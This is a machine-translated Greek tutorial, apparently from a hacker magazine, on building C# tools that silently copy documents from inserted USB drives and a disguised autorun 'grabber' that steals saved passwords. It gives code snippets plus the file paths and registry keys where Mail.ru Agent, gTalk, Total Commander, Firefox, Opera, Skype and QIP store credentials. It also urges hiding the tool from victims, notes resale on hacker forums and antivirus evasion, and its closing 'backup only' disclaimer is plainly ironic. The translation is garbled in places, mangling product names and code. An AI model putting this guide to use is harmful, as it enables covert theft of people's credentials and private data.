    Μια μονάδα flash USB εισήχθη στο pisyuk μας - ας προσπαθήσουμε να μάθουμε το γράμμα της μονάδας που της έχει εκχωρήσει το σύστημα. Όπως και στο "Πεδίο των θαυμάτων", μπορείτε να το μαντέψετε, αλλά είναι καλύτερα να αφαιρέσετε τις πληροφορίες από τη δομή DEV_BROADCAST_VOLUME.

    Typedef struct _DEV_BROADCAST_VOLUME ( DWORD dbcv_size; //DWORD μέγεθος δομής dbcv_devicetype; //Τύπος συσκευής DWORD dbcv_reserved; //Δεσμ.

    Από όλα τα πεδία αυτής της δομής, μας ενδιαφέρει το dbcv_unitmask. Σημειώστε ότι αυτή η ιδιότητα περιέχει μόνο ένα κομμάτι ενός γράμματος, όχι τη συμβολική του αναπαράσταση. Για παράδειγμα, εάν η τιμή είναι 0, τότε το γράμμα μονάδας δίσκου θα είναι A. αν 1, τότε Β κ.λπ. Για τη διευκόλυνση της λήψης ενός συμβολικού γράμματος, είναι καλύτερο να γράψετε μια συνάρτηση.

    Εάν διαβάζετε τη στήλη μας εδώ και πολύ καιρό και είστε εξοικειωμένοι με τις λειτουργίες API, τότε δεν χρειάζεται να διαβάσετε το επόμενο μέρος του άρθρου. Ανοίξτε το πρόγραμμα επεξεργασίας και ξεκινήστε τη γλυπτική εφαρμογών. Έχω περιγράψει όλες τις απαραίτητες δομές και λειτουργίες. απλά πρέπει να τα βάλεις μαζί στο πρόγραμμα. Αποφασίστε, και θα αρχίσω να ασχολούμαι με το .NET και το C # συγκεκριμένα.

    Ας χτυπήσουμε .NET "Ωμ

    Ώρα να αρχίσετε να εξασκείτε και να εφαρμόσετε τις γνώσεις σας στη γλώσσα C#. "Τι στο καλό? - εσύ ρωτάς. - Μίλησα το μισό άρθρο για το WinAPI, αλλά μετά αποφάσισα ανόητα να κάνω μια κλήση σε όλες τις λειτουργίες με τη μορφή εγγενούς κώδικα; Πού είναι η ισχυριζόμενη αστραπιαία ταχύτητα ανάπτυξης;

    Σε κάτι έχεις δίκιο. Η εφαρμογή μας θα χρησιμοποιεί όντως λειτουργίες WinAPI (όχι ευκολότερος τρόπος), αλλά δεν θα τις περιγράψουμε μόνοι μας. Πολλοί προγραμματιστές αντιμετώπισαν το πρόβλημα του προσδιορισμού μονάδων flash. Ως αποτέλεσμα αυτών των αψιμαχιών, άρχισαν να εμφανίζονται δωρεάν μαθήματα για το C #, στα οποία έχουν ήδη εφαρμοστεί όλες οι απαραίτητες λειτουργίες. Πρέπει απλώς να συνδέσουμε ένα τέτοιο κενό (ανάγνωση συνιστώσα) στο έργο μας και να καλέσουμε μερικές μεθόδους. Θα χρησιμοποιήσουμε μία από αυτές τις τάξεις τώρα. Αλλά η γνώση των δομών που περιγράφονται παραπάνω θα είναι σίγουρα χρήσιμη κατά τη μεταφορά αυτού του προγράμματος στο API των Windows.

    Υπάρχουν πολλά έτοιμα μαθήματα που λύνουν τέτοια προβλήματα, αλλά μου άρεσε περισσότερο η εκδοχή του Jan Dolinay. Αυτό το άτομο έγραψε μια πολύ εύχρηστη και κατανοητή τάξη DriveDetector που μπορεί:

  • Προσδιορίστε εάν είναι συνδεδεμένη μονάδα flash
  • Καθορίστε ένα αίτημα για αποπροσάρτηση μιας συνδεδεμένης μονάδας flash
  • Προσδιορίστε το γεγονός ότι το φλας είναι απενεργοποιημένο
  • Λάβετε το γράμμα μονάδας δίσκου μιας πρόσφατα συνδεδεμένης μονάδας flash
  • Παρέχετε μια λίστα αρχείων που έχουν ανοίξει από μια μονάδα flash
  • Και το πιο σημαντικό, αυτό το μάθημα είναι εξαιρετικά εύκολο στην εργασία - θα το δείτε τώρα. Η σύνδεση μιας τάξης με το έργο σας γίνεται με τυπικό τρόπο και δεν έχει νόημα να σταθούμε σε αυτό. Ας προχωρήσουμε λοιπόν στην προετοιμασία. Γίνεται ως εξής:

    FlashDriveDetector = νέο DriveDetector(); flashDriveDetector.DeviceArrived += νέο DriveDetectorEventHandler(OnDriveArrived); flashDriveDetector.DeviceRemoved += νέο DriveDetectorEventHandler(OnDriveRemoved);

    Αφού δημιουργήσω ένα αντικείμενο της κλάσης DriveDetector, ορίζω τους χειριστές συμβάντων DevieArrived() και DriveRemoved(). Με το όνομά τους, δεν είναι δύσκολο να μαντέψει κανείς για τι ευθύνονται. Όλος ο κώδικας αρχικοποίησης γράφεται καλύτερα στη μέθοδο Form1(). Ο κύριος κωδικός του προγράμματός μας θα βρίσκεται στο πρόγραμμα χειρισμού συμβάντων DeviceArrived. Μπορείτε να δείτε το κείμενό του στην πλαϊνή γραμμή:

    String dirName = Environment.GetCommandLineArgs() + "flash_" + DateTime.Now.ToString("dd-MM-yy-hh-mm-ss"); CreateDirectory(dirName); xDirectory flashcopier = new xDirectory(); flashcopier.IndexComplete += νέος IndexCompleteEventHandler(IndexComplete); flashcopier.ItemCopied += new ItemCopiedEventHandler(ItemCopied); flashcopier.CopyComplete += νέος CopyCompleteEventHandler(CopyComplete); flashcopier.Source = new DirectoryInfo(e.Drive.ToString()); flashcopier.Destination = new DirectoryInfo(dirName); flashcopier.Overwrite = true; flashcopier.FolderFilter = "*"; flashcopier.FileFilters.Add("*.doc"); flashcopier.FileFilters.Add("*.xls"); //Ορισμός άλλων φίλτρων //.... flashcopier.StartCopy();

    Στην αρχή της καταχώρισης, ορίζω τη διαδρομή προς το φάκελο όπου θα αντιγράψουμε τα περιεχόμενα της μονάδας flash. Θα αντιγράψουμε στον κατάλογο "flash_current date" που βρίσκεται μαζί με τον φάκελο από τον οποίο εκκινείται η εφαρμογή μας - είναι πιο βολικό. Έχοντας αποφασίσει για το όνομα ενός φακέλου, προσπαθώ να τον δημιουργήσω χρησιμοποιώντας τη συνάρτηση CreateDirectory(). Έγραψα αυτή τη λειτουργία αποκλειστικά για ευκολία. Δημιουργεί μια παρουσία του αντικειμένου DirectoryInfo που έχει σχεδιαστεί για να λειτουργεί με καταλόγους και καλεί τη μέθοδο Create (), η οποία δημιουργεί έναν νέο φάκελο.

    Αφού δημιουργήσετε έναν φάκελο, μπορείτε να αντιγράψετε. Αντιγράφω όλα τα αρχεία χρησιμοποιώντας ένα αντικείμενο τύπου xDirectory. Εάν πληκτρολογήσετε μόνοι σας τον κώδικα από την καταχώριση, τότε όταν προσπαθείτε να μεταγλωττίσετε, ο μεταγλωττιστής θα δημιουργήσει ένα σφάλμα στο οποίο θα λέει ασπρόμαυρο: "Δεν βρέθηκε αντικείμενο αυτού του τύπου".

    Το θέμα είναι ότι το xDirectory είναι μια κατηγορία τρίτου κατασκευαστή. Μια φορά κι έναν καιρό, το βρήκα στο Διαδίκτυο και από τότε το χρησιμοποιώ συχνά στα έργα μου. Μου αρέσει γιατί αρκεί να καλέσετε μια μέθοδο για να αντιγράψετε υποφακέλους. Επιπλέον, σας επιτρέπει να ορίσετε φίλτρα.

    Πραγματικά κάντε χωρίς αυτό. Παίρνουμε τυπικές τάξεις, μια τεχνική πολύ γνωστή σε όλους τους προγραμματιστές - αναδρομή - και γράφουμε μερικές δεκάδες γραμμές κώδικα. Δυστυχώς, δεν θέλω να το κάνω αυτό. Είναι ο 21ος αιώνας στην αυλή, πρέπει να βελτιστοποιήσουμε τις ενέργειές μας στο μέγιστο και το xDirectory θα μας βοηθήσει σε αυτό.

    Η ενότητα με την κλάση βρίσκεται στον δίσκο μας και μπορείτε να μάθετε για το σκοπό των μεθόδων/ιδιοτήτων/γεγονότων κοιτάζοντας τον αντίστοιχο πίνακα.

    ιδιότητες της κλάσης xDirectory

    xDirectory Class Methods

    Δοκιμάστε να εκτελέσετε την εφαρμογή μας και να τοποθετήσετε μια μονάδα flash. Μετά από μερικά δευτερόλεπτα (ανάλογα με την ακαταστασία της μονάδας flash), όλα τα περιεχόμενα της μονάδας USB θα μεταφερθούν στο φάκελο από τον οποίο ξεκινήσατε την εφαρμογή που έχετε μόλις ψήσει.

    λαβή USB

    Τώρα ας εξετάσουμε το αντίστροφο πρόβλημα και ας μιλήσουμε για τις αποχρώσεις της δημιουργίας του λεγόμενου. λαβή μονάδας flash. Η αρχή της δημιουργίας είναι ακριβώς η ίδια. Πρέπει να γράψετε μια απλή εφαρμογή που θα εκτελείται αυτόματα μετά την εγκατάσταση της μονάδας flash.

    Κατά τη διαδικασία της εργασίας, η εφαρμογή θα περάσει από τους φακέλους / τα κλειδιά μητρώου στους οποίους τα δημοφιλή προγράμματα αποθηκεύουν αποθηκευμένους κωδικούς πρόσβασης και, εάν είναι δυνατόν, θα αντιγράψουν όλες τις πληροφορίες σε έναν από τους φακέλους τους. Για να μην προκαλέσει το autorun σας υποψίες στον φτωχό χρήστη, κάντε τον κόπο να το κρύψετε προσεκτικά. Για παράδειγμα, κάτω από το μενού εκκίνησης.

    Πιθανότατα γνωρίζετε ότι οι λεγόμενες φορητές εκδόσεις εφαρμογών έχουν γίνει πολύ δημοφιλείς τώρα, δηλαδή προγράμματα που μπορούν να λειτουργήσουν απευθείας από μια μονάδα flash. Αυτός είναι ο καλύτερος τρόπος για να παίξετε. Σχεδιάστε το πρόγραμμα με το κατάλληλο στυλ και, για αξιοπιστία, ρίξτε μερικά κουμπιά που έχουν σχεδιαστεί για την εκκίνηση οποιωνδήποτε προγραμμάτων. Το σχέδιό μου φαίνεται στην εικόνα.

    Πώς θα ληστέψουμε;

    Πρέπει να πω αμέσως ότι δεν υπάρχει λόγος να εκτελείτε ενέργειες σούπερ-χάκερ εδώ. Τα περισσότερα προγράμματα αποθηκεύουν προσωπικά δεδομένα στο φάκελο Documents and Settings\User\Application Data\%ProgramName% ή στο μητρώο. ProgramName σημαίνει οποιοδήποτε πρόγραμμα. Εάν αντιμετωπίζετε την πρώτη επιλογή, τότε θα πρέπει να χρησιμοποιήσετε την ήδη γνωστή κλάση xDirectory (ή τυπικές μεθόδους εργασίας με αρχεία) και να αντιγράψετε όλα όσα χρειάζεστε με αυτήν. Στη δεύτερη περίπτωση, θα πρέπει να εργαστείτε με το μητρώο. Δεν θα δώσω παράδειγμα αντιγραφής αρχείων (το έχουμε ήδη εξετάσει), αλλά θα σας δείξω πώς να αλληλεπιδράτε με το μητρώο χρησιμοποιώντας εργαλεία .NET (χρησιμοποιώντας το παράδειγμα προσδιορισμού της διαδρομής προς το φάκελο TC):

    RegistryKey readKey = Registry.CurrentUser.OpenSubKey(" software\\Ghisler\\ Συνολικός Διοικητής"); string key = (string) readKey.GetValue("InstallDir");

    Αυτό είναι όλο. Δεν θα υπάρχει άλλος κωδικός. Αυτή η γνώση θα πρέπει να είναι αρκετή για να τραβήξετε αρχεία με πολύτιμες πληροφορίες. Για να κάνω τα πράγματα λίγο πιο εύκολα, έχω ετοιμάσει μια λίστα με τα περισσότερα δημοφιλή προγράμματακαι ζωγράφισαν όλους τους τρόπους με τους οποίους αποθηκεύουν τα αποθηκευμένα δεδομένα χρήστη.

    Mail.Agent

    Ο αγγελιοφόρος από το Mail.ru είναι πλέον πολύ δημοφιλής μεταξύ των απλών θνητών χρηστών (ειδικά μεταξύ των γυναικών). Οι στόχοι είναι ξεκάθαροι, τα καθήκοντα έχουν τεθεί, επομένως μας ενδιαφέρει:

  • Ιστορία. Το MA αποθηκεύει ολόκληρο το ιστορικό της αλληλογραφίας του χρήστη στα Έγγραφα και τη ρύθμιση\%User%\Application Data\Mra\base . Υπάρχει ένα αρχείο στον βασικό φάκελο mra.dbs. Αυτό, στην πραγματικότητα, είναι το αρχείο ιστορικού.
  • Λίστα επαφών. Η λίστα επαφών βρίσκεται στο φάκελο MRA\%user account%\clist5.txt. Λάβετε υπόψη ότι μπορεί να υπάρχουν πολλοί χρήστες που εργάζονται με το mail.agent (ή ένας χρήστης μπορεί να έχει πολλούς λογαριασμούς). Επομένως, θα ήταν πολύ λογικό να αντιγράψετε όλους τους φακέλους που περιέχουν το σύμβολο «@» στο όνομα.
  • Κωδικός πρόσβασης. Κωδικός πρόσβασης (ακριβέστερα, ο κατακερματισμός του) από λογαριασμόςΟ χρήστης βρίσκεται στο μητρώο κατά μήκος της διαδρομής - HKCU\Software\Mail.RU\Agent\magent_logins2\%Account% στην παράμετρο ####password.
  • gTalk

    Εταιρία Googleδημιουργεί βολικά και λειτουργικά προϊόντα, μεταξύ των οποίων υπάρχει ένας πελάτης Gabber - gTalk. Σήμερα gTalkόχι πολύ δημοφιλής ακόμα. Δεν είναι εγκατεστημένο σε κάθε δεύτερο υπολογιστή, αλλά μερικές φορές εξακολουθεί να εμφανίζεται και, για να μπούμε στο θέμα, είναι καλύτερα να μάθουμε αμέσως το πρόγραμμά μας να παίρνει κωδικούς πρόσβασης και από αυτόν τον messenger. Οι κωδικοί πρόσβασης για όλους τους λογαριασμούς gTalk αποθηκεύονται στο μητρώο - HHEY_CURRENT_USER\Software\Google\Google Talk\Accounts . Αυτός ο κλάδος παραθέτει όλους τους λογαριασμούς στους οποίους έχετε συνδεθεί ποτέ gTalk. Οι κωδικοί πρόσβασης λογαριασμού αποθηκεύονται σε παράμετρος συμβολοσειράς pw.

    Συνολικός Διοικητής

    Συνολικός Διοικητής- μακράν το πιο δημοφιλές διαχείριση αρχείων. Το πρόγραμμα περιέχει περίπου ένα βαγόνι και ένα μικρό καρότσι (και ο ίδιος αριθμός μπορεί να συνδεθεί σε αυτό χρησιμοποιώντας πρόσθετα πρόσθετα). Μας ενδιαφέρει μόνο ο ενσωματωμένος πελάτης FTP. Χρησιμοποιείται από πολλούς και οι κωδικοί πρόσβασης, φυσικά, αποθηκεύονται.

    Το TC, σε αντίθεση με πολλά άλλα προγράμματα, δεν αποθηκεύει κωδικούς πρόσβασης στο μητρώο, αλλά χρησιμοποιεί τα παλιά καλά αρχεία ini. Κωδικοί πρόσβασης, καθώς και όλα τα απαραίτητα δεδομένα για τη σύνδεση με τους διακομιστές (ip, port, όνομα χρήστη κ.λπ.) Συνολικός Διοικητήςαποθηκεύει σε ένα αρχείο wcx_ftp.ini, το οποίο βρίσκεται αθώα στο φάκελο του προγράμματος. Διαδρομή στον κατάλογο όπου είναι εγκατεστημένο Συνολικός Διοικητής, μπορείτε να μάθετε από το μητρώο. Ψάξτε στον κλάδο HKEY_CURRENT_USER\Software\Ghisler\Total Commander.

    firefox

    Σήμερα, ένα πρόγραμμα περιήγησης δεν είναι απλώς ένα πρόγραμμα για ταξίδια στο WEB, αλλά ένας ολόκληρος συνδυασμός που, εκτός από διάφορες δυνατότητες, αποθηκεύει πολλές εμπιστευτικές πληροφορίες. Χαρακτηριστικό παράδειγμα αυτού είναι οι φόρμες ιστού. Το 99% των σύγχρονων τοποθεσιών απαιτούν εγγραφή. Το να θυμάστε και να έχετε συνεχώς υπόψη τον συνδυασμό σύνδεσης / κωδικού πρόσβασης για κάθε ιστότοπο είναι μια μη ρεαλιστική εργασία, ειδικά εάν είστε προχωρημένος χρήστης και η πλοήγηση στο Διαδίκτυο δεν περιορίζεται μόνο στο Odnoklassniki και στο VKontakte.

    Οι προγραμματιστές έχουν κάνει τη ζωή πιο εύκολη για τους χρήστες και έχουν ενσωματώσει τα λεγόμενα «θησαυροφυλάκια κωδικών πρόσβασης» στα προγράμματα. Εγγράφηκα, συνδέθηκα στον λογαριασμό μου, διέταξα το πρόγραμμα περιήγησης να θυμάται τα διαπιστευτήρια - και ξέχασα. Την επόμενη φορά που θα επισκεφθείτε, το μόνο που μένει είναι να κάνετε μερικά κλικ του ποντικιού και είστε ήδη στον ιστότοπο. Εφόσον το πρόγραμμα περιήγησης αποθηκεύει κωδικούς πρόσβασης, σημαίνει ότι έχουμε την ευκαιρία να κλέψουμε ολόκληρη τη βάση δεδομένων του.

  • sessionstore.js - το αρχείο περιέχει όλες τις αποθηκευμένες συνεδρίες.
  • signons3.txt - κρυπτογραφημένοι κωδικοί πρόσβασης (για την τρίτη έκδοση του FF).
  • signons.sqlite - βάση δεδομένων SQLite που περιέχει όλους τους κρυπτογραφημένους κωδικούς πρόσβασης.
  • key3.db - βάση δεδομένων που περιέχει κλειδιά για πιστοποιητικά.
  • Όλα αυτά τα αρχεία βρίσκονται στο γνωστό Document and Settings\%UserName%\Application Data\Mozilla\FireFox\Profiles\%ProfileName% .

    ΛΥΡΙΚΗ ΣΚΗΝΗ

    ΛΥΡΙΚΗ ΣΚΗΝΗ- ένα πρόγραμμα περιήγησης που είναι πολύ δημοφιλές στους Ρώσους χρήστες. Φυσικά, δεν μπορούμε να το αφήσουμε χωρίς επίβλεψη. Έτσι, με την Opera η κατάσταση είναι περίπου η ίδια όπως και με το FireFox. Όλοι οι κωδικοί πρόσβασης που είναι αποθηκευμένοι στο πρόγραμμα περιήγησης αποθηκεύονται στο Document and Settings\%UserName%\Application Data\Opera\profile στο αρχείο wand.dat. Αποδεικνύεται ότι όταν εντοπιστεί η Opera, θα ενεργήσουμε με τον ίδιο τρόπο όπως στην περίπτωση του firefox.

    Skype

    Η δημοτικότητα του Skype αυξάνεται καθημερινά. Πολλοί το χρησιμοποιούν όχι ως μέσο πραγματοποίησης κλήσεων, αλλά για μια συνηθισμένη βολική συνομιλία. Όλα τα εμπιστευτικά δεδομένα, όπως αναμενόταν, βρίσκονται στο προφίλ χρήστη (στο ίδιο σημείο όπου τα αποθηκεύει η Opera ή η FF). Για να τα "ιδιωτικοποιήσετε", θα πρέπει να αντιγράψετε το προφίλ χρήστη από το Document and Settings\%userName%\Application Data\Skype\ και να εξαγάγετε τον κλάδο μητρώου - HKEY_CURRENT_USER\Software\Skype\ProtectedStorage .

    QIP

    Όπως τα περισσότερα από τα προγράμματα που περιγράφηκαν προηγουμένως, το QIP αποθηκεύει όλους τους αποθηκευμένους κωδικούς πρόσβασης στο Application Data\qip.

    Η αντιγραφή ολοκληρώθηκε

    Η τεχνολογία .NET έχει απλοποιήσει πολύ το έργο μας, με αποτέλεσμα όλη η κωδικοποίηση να έχει περιοριστεί στην κλήση μερικών μεθόδων. Φυσικά, μπορείτε να πείτε ότι αυτό δεν είναι ωραίο και ότι τέτοια πράγματα είναι πολύ πιο αποτελεσματικά να γράφετε σε WinAPI ή ASM "π.χ. Κατά κάποιο τρόπο, συμφωνώ μαζί σας, αλλά έχετε υπόψη σας, στο WinAPI και, ειδικά, στο Asma , γράψτε ένα τέτοιο πρόγραμμα όπως αυτό αλλά δεν θα τα καταφέρετε γρήγορα. Ενώ άλλοι γράφουν κώδικα χιλιομέτρων, εσείς και εγώ θα τρυγήσουμε. Καλή επιτυχία στον προγραμματισμό και αν έχετε απορίες, παρακαλώ, γράψτε στο σαπούνι.

    Μην ξεχνάτε, πολλοί χρήστες αποθηκεύουν εμπιστευτικές πληροφορίες στο φάκελο "Τα έγγραφά μου". Τουλάχιστον, μπορεί να υπάρχουν ενδιαφέροντα έγγραφα εργασίας και μερικές φορές ολόκληρα αρχεία με κωδικούς πρόσβασης. Κάποια στιγμή (στην πρώην δουλειά μου) βρήκα στον υπολογιστή του λογιστή ένα τακτοποιημένο αρχείο με κωδικούς πρόσβασης για πελάτες τραπεζών.

    Ως αληθινός φίλος, πρέπει να βοηθήσετε όλους αυτούς τους ανθρώπους να δημιουργήσουν αντίγραφα ασφαλείας των ευαίσθητων πληροφοριών τους.

    Πολλά φόρουμ χάκερ έχουν πολλές διαφημίσεις για την πώληση αυτού του είδους λογισμικού. Διαφορετικές τιμές - από 10$ έως 100$. Έχοντας ολοκληρώσει τα παραδείγματα που αναφέρονται στο άρθρο, μπορείτε να κερδίσετε μια κρούστα μαύρου ψωμιού με χαβιάρι. Επαναλαμβάνω, το κύριο πράγμα είναι να προσεγγίσουμε το θέμα δημιουργικά και όλα θα πάνε σίγουρα. Και πάλι, δεν εντοπίζεται από τα antivirus;).

    Προειδοποίηση!

    Χρησιμοποιούμε αυτό το πρόγραμμα αποκλειστικά για την έγκαιρη δημιουργία αντιγράφων ασφαλείας των περιεχομένων των μονάδων flash στο δίσκο και τη δημιουργία αντιγράφων ασφαλείας των κωδικών πρόσβασης σε μια μονάδα flash. Και τι νόμιζες; Η παράνομη χρήση τέτοιου λογισμικού τιμωρείται!